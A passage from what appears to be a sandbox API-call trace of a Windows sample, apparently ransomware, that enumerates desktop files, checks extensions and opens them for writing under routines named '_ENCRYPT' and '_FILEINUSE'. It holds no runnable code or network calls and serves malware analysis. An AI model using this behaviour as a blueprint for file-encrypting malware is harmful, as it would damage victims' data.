(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0158.758] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0158.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0158.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.759] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.759] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0158.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0158.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.760] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0158.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0158.760] CloseHandle (hObject=0x120) returned 1 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.761] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0158.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0158.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.762] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.762] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.762] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.762] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.762] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.762] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.762] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.762] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.762] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.762] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0158.763] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.763] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.763] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0158.764] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.764] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.764] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.764] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.764] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.764] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.764] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.764] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.766] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\falabydgbqpgwn8jboac.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.766] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.766] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.766] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.766] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.766] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.767] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.767] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.767] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.767] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.767] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.767] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.767] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.768] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.768] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.768] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.768] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00b9030, ftCreationTime.dwHighDateTime=0x1d5d7c1, ftLastAccessTime.dwLowDateTime=0xa6ca5750, ftLastAccessTime.dwHighDateTime=0x1d5df94, ftLastWriteTime.dwLowDateTime=0xa6ca5750, ftLastWriteTime.dwHighDateTime=0x1d5df94, nFileSizeHigh=0x0, nFileSizeLow=0x2520, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="FAlaByDgBqpgWn8JbOac.mp3", cAlternateFileName="FALABY~1.MP3")) returned 0x90add8 [0158.769] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.769] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00b9030, ftCreationTime.dwHighDateTime=0x1d5d7c1, ftLastAccessTime.dwLowDateTime=0xa6ca5750, ftLastAccessTime.dwHighDateTime=0x1d5df94, ftLastWriteTime.dwLowDateTime=0xa6ca5750, ftLastWriteTime.dwHighDateTime=0x1d5df94, nFileSizeHigh=0x0, nFileSizeLow=0x2520, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="FAlaByDgBqpgWn8JbOac.mp3", cAlternateFileName="FALABY~1.MP3")) returned 0x90add8 [0158.769] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.769] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 